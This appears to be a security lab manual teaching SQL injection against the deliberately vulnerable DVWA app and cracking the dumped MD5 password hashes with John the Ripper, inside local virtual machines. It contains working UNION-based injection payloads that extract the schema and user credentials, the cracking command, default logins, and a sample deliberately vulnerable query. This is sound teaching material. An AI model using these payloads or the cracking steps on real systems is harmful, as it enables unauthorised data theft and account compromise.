Lab 4 Manual SQL Injection, John The Ripper

The document provides a detailed guide on using the Damn Vulnerable Web App (DVWA) for practicing SQL injection techniques in a controlled environment. It covers the installation and configuration of virtual machines, executing SQL injections to retrieve sensitive data, and using John the Ripper to crack password hashes. Additionally, it includes legal disclaimers and emphasizes the importance of ethical behavior in security practices.


(Damn Vulnerable Web App (DVWA): Lesson 6)


{ Manual SQL Injection, John the Ripper }
Section 0. Background Information
What is Damn Vulnerable Web App (DVWA)?
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application
that is damn vulnerable.
Its main goals are to be an aid for security professionals to
test their skills and tools in a legal environment, help web
developers better understand the processes of securing web
applications and aid teachers/students to teach/learn web
application security in a classroom environment.

What is a SQL Injection?


SQL injection (also known as SQL fishing) is a technique often
used to attack data-driven applications.
This is done by including portions of SQL statements in an entry
field in an attempt to get the website to pass a newly formed
rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection
technique that exploits a security vulnerability in an
application's software.
The vulnerability arises when user input is either incorrectly
filtered for string literal escape characters embedded in SQL
statements, or is not strongly typed and is therefore
unexpectedly executed as SQL. SQL injection is mostly known as
an attack vector for websites but can be used to attack any type
of SQL database.

What is SQL Injection Harvesting?


SQL Injection Harvesting is where a malicious user supplies SQL
statements to render sensitive data such as usernames, passwords,
database tables, and more.

Pre-Requisite Lab
Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14

Lab Notes
In this lab we will do the following:
1. We will inject always-true SQL statements into the SQL
Injection User ID field with security set to low.
2. We will obtain the username and raw-MD5 password contents
from the users table.
3. We will use John the Ripper to crack the raw-MD5 password
HASH for each user.
Legal Disclaimer
As a condition of your use of this Web site, you warrant to
computersecuritystudent.com that you will not use this Web site
for any purpose that is unlawful or that is prohibited by these
terms, conditions, and notices.
In accordance with UCC § 2-316, this product is provided with "no
warranties, either expressed or implied." The information
contained is provided "as-is", with "no guarantee of
merchantability."
In addition, this is a teaching website that does not condone
malicious behavior of any kind.
You are on notice that continuing and/or using this lab outside
your "own" test environment is considered malicious and is
against the law.
© 2012 No content replication of any kind is allowed without
express written permission.

Section 1: Configure Fedora14 Virtual Machine Settings


1. Open Your VMware Player
Instructions:
1. On Your Host Computer, Go To
2. Start --> All Programs --> VMWare --> VMWare Player

2. Edit fedora14 Virtual Machine Settings


Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings
3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click on the OK Button.

Section 2: Login to Fedora14


1. Start Fedora14 VM Instance
Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine
2. Login to Fedora14
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Section 3: Open Console Terminal and Retrieve IP Address
1. Start a Terminal Console
Instructions:
1. Applications --> Terminal
2. Switch user to root
Instructions:
1. su - root
2. <Whatever you set the root password to>
3. Get IP Address
Instructions:
1. ifconfig -a
Notes(FYI):
As indicated below, my IP address is 192.168.1.106.
Please record your IP address.

Section 4: Configure BackTrack Virtual Machine Settings


1. Open Your VMware Player
Instructions:
1. On Your Host Computer, Go To
2. Start --> All Programs --> VMWare --> VMWare Player

2. Edit BackTrack Virtual Machine Settings


Instructions:
1. Highlight BackTrack5R1
2. Click Edit virtual machine settings
3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Do not Click on the OK Button.
Section 5: Login to BackTrack
1. Start BackTrack VM Instance
Instructions:
1. Start Up VMWare Player
2. Select BackTrack5R1
3. Play virtual machine
2. Login to BackTrack
Instructions:
1. Login: root
2. Password: toor or <whatever you changed it to>.
3. Bring up the GNOME
Instructions:
1. Type startx

Section 6: Open Console Terminal and Retrieve IP Address


1. Open a console terminal
Instructions:
1. Click on the console terminal

2. Get IP Address
Instructions:
1. ifconfig -a
Notes(FYI):
As indicated below, my IP address is 192.168.1.105.
Please record your IP address.
Section 7: Login to DVWA
1. Start Firefox
Instructions:
1. Click on Firefox
2. Login to DVWA
Instructions:
1. Start up Firefox on BackTrack
2. Place http://192.168.1.106/dvwa/login.php in the address bar.
Replace 192.168.1.106 with Fedora's IP address obtained
in (Section 3, Step 3).
3. Login: admin
4. Password: password
5. Click on Login
Section 8: Set Security Level
1. Set DVWA Security Level
Instructions:
1. Click on DVWA Security, in the left hand menu.
2. Select "low"
3. Click Submit
Section 9: Manual SQL Injection
1. SQL Injection Menu
Instructions:
1. Select "SQL Injection" from the left navigation menu.
2. Basic Injection
Instructions:
1. Input "1" into the text box.
2. Click Submit.
3. Note, webpage/code is supposed to print ID, First name, and
Surname to the screen.
Notes(FYI):
Below is the PHP select statement that we will be exploiting,
specifically the unsanitized $id variable:
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

3. Always True Scenario


Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or '0'='0
2. Click Submit
Notes(FYI):
In this scenario we are asking the database for all records where
the first condition is false plus all records where the second
condition is true, which is every row in the table.
%' - will probably not equal any user_id, so this condition is
false.
'0'='0' - is always true, because 0 will always equal 0.
Database Statement
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
4. Display Database Version
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, version() #
2. Click Submit
Notes(FYI):
Notice in the last displayed line, 5.1.60 is displayed in the
surname.
This is the version of the mysql database.
5. Display Database User
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, user() #
Notes(FYI):
Notice in the last displayed line, root@localhost is
displayed in the surname.
This is the name of the database user that executed the
behind the scenes PHP code.
6. Display Database Name
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, database() #
Notes(FYI):
Notice in the last displayed line, dvwa is displayed in the
surname.
This is the name of the database.
7. Display all tables in information_schema
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables #
2. Click Submit
Notes(FYI):
Now we are displaying all the tables in the
information_schema database.
The INFORMATION_SCHEMA is the information database, the place
that stores information about all the other databases that
the MySQL server maintains.
8. Display all the user tables in information_schema
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
2. Click Submit
Notes(FYI):
Now we are displaying all the tables that start with the
prefix "user" in the information_schema database.
9. Display all the column names of the users table from information_schema
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
2. Click Submit
Notes(FYI):
Now we are displaying all the columns in the users table.
Notice there are user_id, first_name, last_name, user and
password columns.

10. Display the contents of all the columns in the users table
Instructions:
1. Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
2. Click Submit
Notes(FYI):
Now we have successfully displayed all the authentication
information (usernames and password hashes) stored in this
database.
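The following is an added example, not code from DVWA or from this lab, showing why the always-true input from Step 3 works against the concatenated query in Step 2 and why a parameterised query stops it. It assumes a constructed SQLite stand-in for DVWA's users table (sample rows, not DVWA's real data) rather than MySQL.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin"),
    (2, "Gordon", "Brown", "gordonb"),
    (3, "Hack", "Me", "1337"),
    (4, "Pablo", "Picasso", "pablo"),
    (5, "Bob", "Smith", "smitty"),
]

ALWAYS_TRUE_INPUT = "%' or '0'='0"   # the User ID text from Section 9, Step 3


def make_db():
    """In-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors DVWA 'low': $id is pasted straight into the SQL string,
    so a quote in the input terminates the literal and the rest is
    parsed as SQL."""
    getid = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(getid).fetchall()


def lookup_hardened(conn, user_id):
    """Parameterised form: the driver sends user_id as a bound value,
    never as SQL text, so the same input simply matches no row."""
    getid = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(getid, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for user_input in ("1", ALWAYS_TRUE_INPUT):
        print(repr(user_input), "vulnerable ->", len(lookup_vulnerable(db, user_input)),
              "rows; hardened ->", len(lookup_hardened(db, user_input)), "rows")
```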
Section 10: Create Password Hash File
1. Create Password Hash File
Instructions:
1. Highlight both admin and the password hash
2. Right Click
3. Copy
2. Open Notepad
Instructions:
1. Applications --> Wine --> Programs --> Accessories -->
Notepad
3. Paste in Notepad
Instructions:
1. Edit --> Paste

4. Format in Notepad
Instructions:
1. Place a ":" immediately after admin
2. Make sure your cursor is immediately after the ":" and hit
the delete button.
3. Now you should see the user admin and the password hash
separated by a ":" on the same line.
4. Cut the username and password combinations for gordonb, 1337,
pablo, and smitty from (Section 11, Step 1) and paste in this
file as well.
5. Save in Notepad
Instructions:
1. Navigate to --> /pentest/passwords/john
2. Name the file name --> dvwa_password.txt
3. Click Save
Section 11: Proof of Lab Using John the Ripper
1. Proof of Lab
Instructions:
1. Bring up a new terminal, see (Section 7, Step 1)
2. cd /pentest/passwords/john
3. ./john --format=raw-MD5 dvwa_password.txt
4. date
5. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
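The following is an added example, not part of the lab or of John the Ripper, that parses the user:hash file built in Section 10, checks that each entry is the raw (unsalted) MD5 layout the --format=raw-MD5 option expects, and contrasts it with a salted, iterated hash. The sample file is constructed; the admin digest is MD5("password"), the DVWA default password from Section 7.

```python
import hashlib
import os

# Constructed sample in the "user:hash" layout produced in Section 10.
SAMPLE_HASH_FILE = """admin:5f4dcc3b5aa765d61d8327deb882cf99
smitty:not-a-hash
"""


def parse_hash_file(text):
    """Parse user:hash lines into a dict, skipping blank or malformed lines."""
    entries = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        entries[user.strip()] = digest.strip().lower()
    return entries


def is_raw_md5(digest):
    """Raw MD5 as john's raw-MD5 mode expects it: 32 hex chars, no salt, no prefix."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest)


def raw_md5_equals(digest, candidate):
    """True when digest is the unsalted MD5 of candidate. Because the hash is
    deterministic and unsalted, one digest lookup covers every user with that
    password; this is what makes raw-MD5 storage weak."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest


def salted_pbkdf2(password, salt=None, iterations=200_000):
    """Defensive contrast: per-user random salt plus an iteration count, so
    equal passwords give different digests and each guess costs far more."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + ":" + dk.hex()


if __name__ == "__main__":
    for user, digest in parse_hash_file(SAMPLE_HASH_FILE).items():
        print(user, "raw-MD5 layout:", is_raw_md5(digest))
    print("salted:", salted_pbkdf2("password"))
```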
Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle
